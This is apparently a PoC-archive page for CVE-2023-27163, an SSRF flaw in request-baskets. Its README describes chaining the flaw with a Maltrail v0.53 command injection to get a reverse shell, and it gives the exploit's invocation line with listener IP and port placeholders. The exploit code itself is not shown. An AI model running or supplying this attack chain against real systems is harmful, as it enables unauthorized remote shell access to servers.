Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-27163 PoC — request-baskets 代码问题漏洞

Source
Associated Vulnerability
Title:request-baskets 代码问题漏洞 (CVE-2023-27163)
Description:request-baskets是rbaskets开源的一个Web服务。 request-baskets v1.2.1版本及之前版本存在安全漏洞,该漏洞源于通过组件/api/baskets/{name}发现包含服务器端请求伪造 (SSRF)漏洞。攻击者利用该漏洞通过特制的API请求访问网络资源和敏感信息。
Description
Requests Baskets (CVE-2023-27163) and Mailtrail v0.53
Readme
# Automatic Exploit

## Summary

The following exploit abuses [**Requests Baskets v1.2.1 SSRF vulnerability**](https://nvd.nist.gov/vuln/detail/CVE-2023-27163) to forward the internal application running at `127.0.0.1:80` to the external application at `/pwned`. Once the **Mailtrail v0.53** application has been forwarded it will execute a reverse shell command against it and within a few seconds the user should obtain a reverse shell onto the machine.

## Command

```
python3 ./exploit http://10.10.10.10:55555 LISTENER-IP LISTENER-PORT
```

## Exploits:
* CVE-2023-27163
* Mailtrail v0.53

## Credits
* https://github.com/overgrowncarrot1
* https://github.com/spookier/Maltrail-v0.53-Exploit
File Snapshot

[4.0K] /data/pocs/92372e0cd6651a6f860975cfe1805755614505c9 ├── [1.4K] exploit.py └── [ 698] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.